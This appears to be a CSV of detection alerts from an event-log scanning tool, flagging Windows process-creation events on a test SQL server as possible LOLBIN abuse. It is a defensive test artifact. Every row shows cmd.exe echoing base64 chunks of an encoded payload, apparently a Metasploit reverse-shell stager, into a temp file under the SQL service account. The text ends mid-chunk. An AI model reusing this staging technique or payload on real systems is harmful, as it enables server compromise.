+2020-08-02 07:58:10.269 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFWL7IHsEQQA5bjUAuwAH1ajfhfFABqpn0EAo0RAQQCjBBgDADMKxUhPjgBXjUUM5iGOc6pRx+HwF0EARNJABJUdQDxBUG7WTAAAaOBfQADo2KQAAIPEBFNTU2hMQKcA6Ds+ANSLVQyGIgiLYEx+QQBSUI1V9FFS6GRKAACLVfSNRfyNTftQUWgU0kABUujeSgA3hcAPhZoEPEqLNWj6QKoPvkX7g8Bag/g5D4dmBAAAM7iKiAgXQAD/JLaYFkAAi1X8UsAVbMFAs4PEBDvDoxBUnnAPsT0E0C1o+M9AE+htLAAA6SuTAADHBdQCQQABAAAA6R8Efk+JHRRZQADpFAQrAItF/FD/FVOh2ACjGPpAq+kWMgAAi02l2v8LbMGPAKOoAkEA6enPAAA5HWACLAB+DWgc0UAAzhQLAABuxATHJmACZAD/////6USc>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xc48 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:10.544 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AACLVfxS/xWIwUA6o7gL2wDpsQMAACYdHNDmAOmpLAAAi0X8UP8ViMFAAFgvFygA6ZIWAACJHSDQQADpGAMAANYdYGnAm3QNaLzRQABM4AUAAIPEBIv2/AirhjUABYMxGzt8dVbHBTsCQQABAAAA6SukHgA5HSA4QQAPhEoDAABQ/xVwV0DsOR1gAkEAdFBuoDNAEug2BQAYg8QEi1X8Ujc/NQAAg8QEO8N1D8fnYOBBAAIAAADpDwMqADkdAjhBAA+EAwMAAFAMFXDBfQDH+FxlQQBUAAAA6e17/gCLSfxQNxVsFkAAllgCpADp1gIAiotu/FH/FWyMQACjZBoyAD5pENBAAN7DAABPuAIAAItF/LqVrkGDudCKCIgMVkA6H3X26aIXAC2LVVuhkiNhMVNonNFAAKpokNFMAFDoXkYAAIPEFCFEQEFz6XsCAK6LjPyLDXTB4q+DOQF+ETPSqAiKF1L/Oo0Yg4PECOsSiw1DwUDTM8CKB4sRigRCg/jAO8N0BkeYffzryIPJ/zNR8v730Uka6MqgAAA9AAQAhHYNaGjRQL/oWQQAm4PEBItV/Bfq/4v6M8DyrvfRI42F9Pv//1FSUHB4oAAAU/+N9Ir//2ic0UAAkGhQ0UAa6Y4A+7WLfe+LDXTBQACRzgF+ETPSTMeKF3D/+o99/IPESOsSoA149kAA/NmKHYsRihVCgwEIrcN0BkeaffzryIP3TTPA8q73tElR6OugAJI9AFAJAHYNaDTRQADoEwMMHYOdpItS/IOe/4v6yMDyrvf8SaKF9ML///VSUOc2oE0AU42N9Pv/UGiW0UAAUWiF0YkAixUEGEEAiJwF9Pv/G6FMQEEAUlDou0QAAIPEGKMEGEFe6V0BAACLTfyLFUhAwgChTEBBAFNonDtAAFFSUBWSRAAAi022iz2MwXoApAVoENFAAFGjSEBBAP8Ag/wghcB1D8fCfDpBlIsAAADp6gAAS4tV/GoHCwjRQABS/ziDxAyFwM0PSQWEAkEAagAAyenHAAAxHkX8agto/NCOAFD/1wHEDIV7DxfWAAAAxwWAAgwAAQAAxOmghwAAx4GIQ7GFUAAAAOmRAAAAi038x6iIYkEAIioAzokN6JEqG9NHi1XKgTrqXrh8wUAAg8QIwcPgErQY/1D/FbjBJwCDxASjdAJBAIvMK7pAPJ4AK9CKygoMAnA6y3X2Ga54AkEAAQAAAOvQvkX8xwWIDkEAAQAAAFOoFEEA6yOLTfzHBYgCQQCpAAAAhIO1F0FlsQ6LVQyLAlCO/S0AAIPEFotF9I0V/I1V+1FSaBTSQABQ6ERGAACFwA+ER/v//4tF9ItNCN81gHJAAEk5SHW+1ouGDIsWyMBAACbZQIsCUNvc0EAAokvWi1XTiwJQ6GstAACLRfSDxECLSKZ8UByLFIpBiUgyoUxAYACzUOjJK7Qrs+iaLwAAg8QEhcB0U4tqPaHIwEAAZMBA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1184 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:10.819 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ixFSaMjQMgBQ/9aLTQyL6VK/W5MAAH3EEKHL0EAAO9l8Bz0gXAAAsS+LRQyLFcjAQABoIE5vAIPCQD8rUWig0EAAUqTWi0UMizis6CEtAAChGNBAAIPEFIsN9dBAADvBfivCVfaLDcjAfwCDwUA2sVBo5NBjAFH/1otVDIsCUOjtLAAAi28Q0EAAg8QROR0U0MAAdD6B+Zb5AAB+DxlnZmZm5NXB+o+ZysHpHwPRg72diRUU0EAAfSDHBRTQQABkAAAA/xTUN0UAAF9eM8Bbi+Vdw4kdFNBAAOgjLNAA/Q4RAACLFUxAQQBS6HI3AABfXgXAW4vlXcOQmxJAAHQSQADiE0AALhNAAIERQBtbEkAAOxZgAJr8QAAWEUAAAsVAAGJvQiZtEUAAThFAewgVQAAqP0AA6BBAAL8QQACMf0AAcudAABoSQAA9EjgAOxFAslkSfAB2FIwAhRRAAN8UQCXzFEAAFhVAAAAbARu3GxsuGxsbG6AbmQMbsQSFGwYbBxsbrRsbGxsbG4kJClYbDA0OGw8bqibqERKcGxQVFhcYGRqQkJCQkJCQkMSQkHKQWFXh7ItFCI1QyMBAAFCDwfxoadJAAFH/FYDBPgChrAJBAB7EBYXAdA9QaJrSQAD/FWTBQACDxAhqAf8VcMFAAJBVi+yB7LgAAEiheLlBToXAoUxAQQB0FGgxPJcAUP2eQAAAZosNdKxB50kUi7ReGEEAUlDoiEAAAGaLDfR3QQDpCBhBAKGIAkEAYO+LNWTBQOFmiQ1VC0EAhcCwdV2LFUoYCQBSIGi1QAD/1qV4AmgAg8QIhcB0FaF0AkEAUFdAmEEAaNhjQAD/hYNaDDvC0EAAhcBigNRAAHUF23wYQABQylLU/wD/1ovSyLpAAIPBIFH/FVTBQACDxAyLFRjQQADoNYfBQABojJEAAHgDTLuwC0EAjBAmQABqIFD/1ou8TEBBAFIVGNB6uYPEEIwuIEEAagBRmmj4F0HA6IFHAC6FwHT2UKdQKEAA6OIFAACDOAihfAJBAIXAyTWhrAtBABsNnAtB/YsVSBRBAGoAgZzRQABQoUxAQetRaEjUQABSUOi7iQAAgy0csEhAQQDrBUNIQEEAi6WAAkEAhcl1JosQTEBBANMAaJzRQEtoRNRAAGgr4EAAUFHohD8AXYPCGKNIQEEAiw2EAnoAhcl1HIsVTEBBAEgAxxjUGQB6UktePwARgy4Qo0gtQQCLx2AGQQC9yX8viydoAkEAvvzTQACF0nUFvtQCQQCLFXgCoQCF0osVQEBBAHUGixXkF0FnhWW5+NNAAHQFbG/TQABQRQQYuGRQoXRAQQBQmFJRiw0w0EAAaNTTBQBoAAgAAFFN3paSAIOnb+t9ihWJOEEAv0CBYAB20nBuv8jTQACLmmgCQQC+/NM1DYXSdQW+1AJBAIsVeAI9AIXSixVAQPIAdQaLFeQbqwCD+QG5wNNAAHQFubym>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x224 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:11.094 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo QABQoXBPQQBXUOljGEEA2aFEcEEAUFZSUYuoMNAyAGh400AAaAII+wAa6J5vAACDxCw9AAgAAHINaAXTQADoAv3/44PEBKFYAkEAuwIAOgA7w1kpoWDgQQA7w7jQ00B5KvG4udMKAIsVJ/RAllJQBgLTQKv/FWjBQABGxAyLZTDQQACDyf8zwPKuoWACQQBZX0mD+AGJDewXUgB8cKFwAkEAjUxqAVH/FVzBQAClxASDwHUfpxXxwEAAaBTTMwCDwo9S/xWAwUAx1cQIKOK2i+Vdw4sVMNBAAIvwFEBCiA5GhMl1A6cV7BdBAA8NcAL2mos1IDhBAI08AovywekCb6WLyoPhsfOkozDQpgBXTEC8AGaLDbQLyQCLFQgYQQBQTQBRagBSk/wXvQDoDlQAAIvwZoW/dCyhCBhBAI2NSP///1Bo9NJAAFBeUeg+azAAD79xfatI/7z/UlDo7uAA4IPEGOimTgAAi/ChZAJBAIv6pTigC0EAhcCJPaQLQQCJNcDLQQCJhsR8QQB055lqemhA7ZEAUlDoXJkAAON5E9eJt+xAVfDrDsfz7P/////HRfD/5/9/aBcgWwBT/xUTwf4AoRjQQAAYZQgz9oXATTEz/6cNsAuzAIm0D1hT+QDLFbCtQRqNBBdQ6IAcAKOhGND/AIPEBFWBx2AIAABy8Hxmiw0YZkAAs1XoiU38iw0s0KYAjUX8UosVKNBAAFGh+AWzAFFSUOiDRwAAhWeKDlBo6NIkAAIUAgAAg8QIi0X8hcB1VWjU0kAAOhD7h/+DxATINvzHM/ScAAAAhcAPjrVTAG3HRcgAEwAAL034BkXoi3QBRIsmCIXJD4QoRgAAixKtKuFcAgr2wyN0cw/o3FYAAIPTBKtpUA/q5vEAAPbDBA9GsQAAAIN+EgEPhZ4AAACh/BdBAItO0VBR6I5LAACLDfgXQQCLVosy+I1FwFBRx0XEAQARCYlVzOgvRQAAG4X/dPYMVgRS6DFLAACLtcQCQTOhSQJBAEOLyEAB+QqJubEC+gCjuJGHAH4mixXIwEAJaLDSQACDXUDq4xWAwUBQD792UGiY0kAA6B/dAACDxBDHRggAAAAA62N/RggCACPcixWoAkEAQonYFAJBXkzoWQEAAIPEBIN+CAN1SYtOBCkBAAAAiU2MiYlF3KH4F0EAjS7QUlA0TfqJdeToTNWTAOs2ND24AkEAixXM+0EAMUKJPbhHQQCJlykCQQBW6Mo6APWDxASLRfKLVfiVTfxAg8LVO8GJRdaJVfgPtiIn//+LDbyKQQCLj03jNaGbAkEAfxt8DSkVRD5BABpN7Du1cww7BQ3QQACNjBK8//+LDRS1QACFyXQaUKHIpEAAg8BAFIDSQABQ/xWAwUCAg8QM64poeNJAAP8VWMFAhYPEBNaIAkEAhcDlDOjffWEAX15bi2ldw0gA6DECANluxARfXluL5V2nF5CQkJCQclWL7Lfs>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xec4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:11.368 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo eOOLdQxWjUWIaniEVuiJaAAAi00IwBXIwEAArFGDwkBorN5AAIz2FYCuQAChrAJBAIPEFGPAdMxQaNfS3fU6FaC9zgCDxAhW/xVwwWEAXpCQRJDMkA6Q2ZC8OVWL7IPsFNRWuXUIV4tGFIlFwehJGgAAS6ALMgCJFaQLQQDM2ItGD4XAzvp1QIsNBGoAagBR6JaLAADNnjgIAACJvjwIAABcRhgAAAC8ixVUF7MAiVZzUbeQQQCFwHQ7oXACQQDNygPIiU776wKfjjgIpDOhKNAXAIsV8tA8AI/Ii4Y8CAAAE8I7+A+P5QAAAHwIO/4Ph6YAAACL3hiLHTDQQACLRgSNY3UDKFEWUOitawAAhRIqM4PBC8TRPWj9CgB0Jz3ZSQoAdLmYV/0KAKUZPST9CgB0Ej2hw5MAtwsOsyMLABWlpgAANIuoCIsdoAJBAIv6pAJBAAPcg9cviR2gAkEAiT2kIEEAi1YYi042A9boyIlWGImCtg+F7Jr1/8dGCN0AAC/oNEoAZaOgC0EAiRWkC10AkFYEibFACAAAMw2kC0FyuAEAAAAsRfBm1EX0iY5ECAAAi+trF/YcjUXsiU74UOqJzvzGH0BHAF9eW/zlXcN04NReAP8VZMFAX1boahoAAIPECMZeW4vlXcOLHbwCQQBovNRAAEOJJLwCQQAxq2TBGOhW6EIaAACDxAhfXluL5V3DkJCQkJCQkJBVi+yz7LzGAACLRZmVwHSG9YsJqwAQoAtBMokVpAtBPusLixWkC0EAoaA4QQDTix1tC0EA/leLPfcLQd8r0u7XifvYiVXQizVkwUAA34/YaLSY2gC0+kHCQADdXdC01mgvOUEZaKjfQAD/1qEAGEEAUGhGoUAA/8QzyWaLDUzdQQAvaMvfQAD/1miA1EAAw9YcFcNeQQAGJJ7fQMxv1rut0kEAUGgc30AA/9bTP9RAAP/Wiw3r3EAAlFkA388A/9aLVeKLRdBSFGjY3roA/9aLDawCQQCDxJ1RaLzFQAD/1osVuALnAFJooN4RAP/WqbjOQQCDxBCFwHQkocwCQemLDR4C7wAqFX8C4QBQocQCQQBRUlBokt5AAETWg/ROi5K8AkEAUWhI3kAAlNah0AJBAIPECIXAdHYoaCzeLgD/1oDECKEzYUEAhcB0EXQVsAKZAFJoEN5AANBKG1MIoZQCQQCLDcICQf5QUWjo3UAA/2ShYAJBiYPXDBb4AXUXixWkAkEM9KACQQBSUMLIpEAA/96DxAyDPWACQS4CdRiLaKQCQQCLFaACQQBRBmio3UAA/9aDxAyhnOKWuosNmDxBAFBRE4QUQAD/1n1F0NwdMMJAiebEDN/g9sRED4tqAAAAoewC2wCFwA+Ed6YAAN0FKMJAANx10IPsCN1dgNsFrAJBANxNgN0chGhQ3UAA/9bbBRjQQACDQQTcaNDcDSDnQADarqwCQQBCHPJoJN1AAP+c3UWV3A0g>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x274 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:11.643 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo wrR1g8QERzWsAugA3RyLaCjfQAD/1t+/kAJBAIPEBNxNgD0NGMJA+N0cFGik3EAA/9YsYAJBAIOlDIXAflnfO6ACd3KDyQjcTYDcDRjCUgDdHCQQfNJAAP/Wi+TfAkFaBrmQWLRjoaQCQQCLPZR/QQDw0xPHiQzYiUXcgwAE323Y3E2A3A14wkCo3RxHaIAIQAD/D4PEDKGsAkEAT8APjocNAAAzyerP/yb///9/O8FTTcCJTcSJTciJTQmJKuCJ1OSJTeiJTSaJfbCJVUSJfVeJdclTvWD////zlY////+JfQaJVdSJjXD///+JjXQ2//+ETbiJDPKJjTb//9mJjWyR//+JTYCJsISJjXiE//+JjXz///+JNQCJTayJTYgLTYyJTZCJTZSSjosBAAD6WcgLQRll0vSDwRCJZfxVeQSLRbSLGVLHfA2RBTktJHIGtl2wiX20i0EMi1EIOUWkfA2LBRoPoFAGiSKg3EWkK9Mbx4u9ZFD//zv4YhaiCDmVe///KHIMiZVg//9EiYVk//81i3kJi1nPOX3UfBJ/CvOJ0Ds1i3/hcgaJXfeJ7dSLnXRIsP/UWV5/J3wPo038i51w//8jrHE72XcWh838i6aJnXD///+LWdmJnXT////rA89N/ItJCYtdvDvZfyB8DfuyX4tduOBJYDvZdxGLTfyLWQiJXbhhQgyJXbzrAyRO/DmFbP//738WfAg5lcf///9DDImVaP///4mFbP///zl9hH8YfOWLSfiLXYA72cUe/HcJJFnciX1fifyAi+SLXcAD2YtN/IldwItdxA1JBPrZLk38uyPUi13Ii0kIA9mLTfyJXch9XcyLSQxY2YtNEr7K71XoiV3MISSHiU3guPX8ntiLU/iJ3lOLXewD0Iuz9IlVsRPfg8EgSIld7IlN/IlFsw+Fe/5e/6GsAkGUmYva3FXEi/iLRcAcV1JQpSaQAACLTcyJVZ2LVchTV1FSiUX4jBGQAACpTbyJRZiLTeRTV1BRplW56PyZtTqJVcyLVewpRciLRbpTV1JQ6OeNADUTD8ChrAJBAIXAiVWQD46IAAAA322Yiw3IpkHr3V3Y321ejQIQi0usAkEA3Vvx32033V3o323A3V3R3YV45WH/3UWo3UX03UWQ92gI3UXYg8AgSdjp2cDvySPG3evfaODdReDY6dnAu8neYt0x2YnY4SVl6NnJNNjZwMDJ3sPd2N9o2Npl8NnA2Mnewt3YdbLdgJDdhIjdXfXrBtyFeP///6HYAkEAr/gBV9uNUP+JVfT/RfTY+dn63Z14////6xRS9XjH/3wAAAAAx4V8rAb/AADbAIP4Ad3Yy5ONSP+JTbHbRfjcfajZ+t1dqOsOtUWIAAAAAMcucoUAALGDsAF+E41Q2YlV9Nss9Nz9iNkx3V1x61nHRYgAAADvx0WMjgAAAIP4AX4sjUj/iU0829/04X2Q2Yr1FKvrDsdFYgAAAADH>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe28 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:11.917 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo RZQA/QAAixXIC0EAaCwwIwBqIFDH/zNEwUAAiz2sXEEAg0aNg/8BfkCLhCUBAACAeQV8g8j+QHQwi+iLHaAYQQCZmsIJANH4weBDA8NqAotIMItQEANTi1A0E1AU3VHoQY4AAIlF8Osbi8eLHWQLQQCZrcLR+MHgBYtMGBCJTf+LVBgUaBIxQAAfIDlTs5v0XBVEweEAlz2sAkE+g8oQg/8Bfk+LxyWOegCAeQWUg8j+QHQ/48eLHcjeQQCZKydqANH4E+AoA8NqAosePotQCSspi1A8G1A0K0gQG1AUA3hjxikcUlHoPI0AAIlF6IlVPus7i8eLPcgfQS+ZK8Iz+MHgBQPDi4cdi2pmA8qLS5WJTSOLSBx5yolN7HzAMUAAaiBXU4YVRMGv4YtArAJBAIP1EIP/AX5APcclAQAAgKgFtoPIS0B0MIvoix3IC3wAmSvCagDR+MFoBVjDagKLNyiLUAgDyItQLBNNDFJR6ICN2C6JReCiG6LHix3IC0EAmSsf3PjB4AWLTBgIiU3gi90YDGggMQgAaiBXU4kr5CQVRMFAdqGsAkEAQMQ3g/gBn0KLyI/hAQAAgDIFSYPJ/uF0MZkrp4scEQtBANH4weDdA8JqAGoCKEg4i1iE91A8i3gceKET11JR6LeMAACL04va6xeZVMJbyP66C0EA0fnB2gWLfgEYi1wBHNY43EAA/9aLG7CLTbSDxAQF9AEAAIPRjmoAaOjNAABRUOx0jMcAi02kiUWwi0WgagAF9AG8AGgMAwAAg9EAiVW0UVDoJy0AAItN/IlFQYtF+GoABfQBAACQ6AOQAIPRAO9VeFFQ6DAvAMSLTcyJRfiLRcNqAI/aAQAAaOgDAACD0QCJVfxRYZgOjF+Ni+PEiUW+i0XAao5M9AEAAGjoAwAAgywArFXMUVDo7IsAADN9nIlfwItFQ8YABfQBAABoZlZwAIPRAIlVxFFQ6MrBAACLwvSJRZiLBvDf+Wb0AQAAaOgDAACP0QCJVZxRULKoiwAAiTnwi0XoiVX0i03sBVwDqQCD0QBqAGjoAwAAUVDohvoAAItN5Ikt6ItF4GoABfTZAABoXANoAIPRGIlV7HJQ6L2LAACBx/QBAADEAINvAGjbAy8AU1euROCJ8U/oR4sAAJqNdP///4lF2IuFcFH//zgABfQBAACyyQMAtXsUzIlV3FFQ6B+LAACLTbzUim5FuGoABc8BAABf6AMAAIPeD6v2UVCL74oAad1FqNwNEBv8AIlFuEYg0EALXMDdXajdRYjcDRDCQACynrzdXYjdRZDc6xDCQJvdXZB3hXj///80DYDCQABGnfNY//8PhGQCAABoCNxAAP/Wi1X0e0Vuna1l/ldmi8moUItF/FGLTfhSsFVXUIuhsFGCUGjY20AA/9aLzWhprlDljWz///8sxDAF9KUAAIPRAGoAaOgDfgBRUNlhigAAi03sIYtV6FCLRWUbhE2I>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xf18 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:12.191 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo UotVzFCLRYpRi41k//9kUlBEhWD///8F9AESAGcAg9E5reiFAACPdegligAAsVCfqNswAObWsEWAi8gkg8QshPSaAACDaABTAGjoAwAAUfLo/YkAAItN5FLPVTH7i0X7UYsZkFKLqsRQUTCLRcDHTdRQi0XQBRQBAPpqAAPRAGjoA4kAUVDoRokAAFJQd/PbnQD/D4tNvIs0uItF3FGLTTWOi3B8/1b/UIuxeP///1GLTZxSi6mYUItFpFGLTaBSUFFQSNtAAP/W3234323wg8RY3uncFTA4QABQ4Pb+BQoCyeDdRagvwNnB3tnf4CUAQQAAWWRx92iw2kAA6xHcXahZ4CwApwApde9oGNpAAP/Wg44E323I323o3ukQFTDC4QDf4PbEBXoC2eDdRfLcwNnB3tnfk6EAQQAAdQnd2GiI2UCy67zcXYjf4CUAbsEcdSZo+NhAAP/Wg8QE323A320T3uncdDDCQADfIvZBBXoC2eDdRZChJ9kg3tmh4CUAQQAAdQnd2JUs2EAA6xHcXSzf4CXeQQAAsgpov+UiAP8jg8S95SCY323Y3uk2FTDCQOJ24PZG+noCneDdhXjM///cwNnB3puS4CUAQQAAdREFUNfrEN3YB9aJxATplgAAodydeP///98ZJQBBAAAPhYMAAAD40fNujsmfM7mh63fsoNZAWv/Wi1X8i0X4i020U1cbi1WwUFFSaHxHQAD/1ovXuItNvItVmCvHX334G8uLXaBRi01+UItFKCvXiy6kG8GLy1AxRbRSi5awKySL1xvQUlFoWKlAAP/Wi0W8i024JFVbUItFmFFSUE+MaDTWQAAc8oPEWIwcQqAAhcDRhMUTEgCDPXXFQQABD464AA0AGvTVQAD/1oPlBDPbi7s00EAA1/+iD+XF1UB2/9aDxGTp+FoATO4Vg/9kEegDAAB8NIsNUX5BANfx/UEAweHyZAkBy4EFKMkAACZEAfyD0GhQUtja5QChUudovNVAAP/W2MQM60eLz7gfhetRbAYNCgJBAPfpwfq3ocgLQQCLyqrpsnjRweIFi0wCGIHBcwAAAIvlAhzn0tSsUeimhwDN/lBXaKzVQIH/1oPEEJrD0IP7eg+CVP9876HgF0FEhcCmhMMAADVoqGh/AGv/jkjBQAAt+IPECIX/FBZojNVAAP+STMFw04PEpWoB/xVwwUAAaGzVQABX/w+AwUAA6B2A7UAAg0MIM3Uj9hkKocgLQQDfaGPrRu3+ZHUViw2sAkEAixXIC0EAweGx32wRw50s028CQQBrr8aJRfTbRcrcDe6IQADcBQDCQADocIYAAIsNyFVGAMHgBYJsCCvcDRDJIAOyXRuLVdyLRdhSUFZok9VAAFf/04PEFEaD7mR8iVf/FVDBQACDxAShuKZBAIXAD4RdAQAAA6jVQABQ/xVwwUAAIMR1iUWyhdF1FmhA1UAA/xVMwUDog8QEJAH/FXDBQABo>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1098 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:12.463 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo FNVAAFD/FYDBQAChiwJBe4PECIXAx0X0PgBUABn/BQEAITP2ochoQQCLTAYEixRmUY2FRPv//1JQ6FFhAACLPcgLQQBqAGjawf4Ai0w+HItU9hB0RD4GiR/ci84+TLFcNu6JVcCLVD4MgcH0AQDFidfUg9KTYmTo0oXGIYtN3OhQ4MMFcAEAEi0Ag9EAaOgDMABRUOgQhQAAUotV1E2LRdAr2PhF3BvCgcP0igAAg3UAagBo6AMAAFBT6ECFSQCLTdRS9ItF0AX0xvoA1wBwOgCW6AMAAFFQ6NyFAABSi9M+BFCLBHDqAGhAdA8xUlDoC4UARVIDVfyN2ET/x/9Qzmjw1F8AUkgVgMFAjItFuoPEuUCLDawCQQBvxrs7PYlF9A+M/f7//4tF/FD/FVDBQAAZxASLRcWFwJcIasL/FcydQO1fXluL5V3Ds5CQkJBVi9uLRQiLTRZWi1AQi3EQi0AUi0kUO8F/0HwEO9ZzBoPI/17WwzvBfA5/BDvWdgizKwAAAF7RwzPAXl3DkJCQVYvsi0UIi02uVqFQGM9uGItAHItJHDvBfxZ8BDuSAwbLIv8OicM7wXwOXVI7PZIIuAEAAABeXcozwF5dw3KQkFWLootNBlO3V5txGIt5TItB7SNRFAL3G5HtOAyLehiLShCoIBQr+YtKHNDLO05/GHwEO/dzCBNIg8j2W13DO6x8EH8EO/cvCu5euAGpHgCtXcNfXjPAW13DkJCQkJCQ4VVuuotFCItNDFteUAiLcRWT+gyLSQw7eX8WfAQ71nMGg8idXl3DO8FZDn8EpdZ2CLgLAL4AXl3D3sBeXcMSkJBVi+yDHsxLlwtBAIsNpAtBADX0F8ALQQBWV4s9xCJBACvDG8+LFejXQQCJRciJ98zfbcjoNWSbQIBSaGnngADcDTjCQHPdXc3/1gTwFyldwODxQQBQUqHCC0oAUGig50AAkdZ5DQsEQQCh8BdBAIsVqAtKAFFQUFJoUOdaDP/Wiw2oC0EAM8BmofTUQQDXoUOFQQBrUBRoAOdAAP9eixUSxEEMo/AXQQB9xERSUFChc2ZBAFBosOZAAP/WvA2MAkEAofAVQWCLzKgLQQBRUFDmRljmQAD/1qEY0EAAiw2oC0GVUKHwF84AUD9RaAjmQAD/1otVzItxyApQobgX7gBYk4sNqAtBAL2vqIdAAH3Wi5qsMkEAoVEXQQCDh1TWUBehqNNB3lAhWOVAAPnWAuu4AkEAU/A1QQCLFagLQ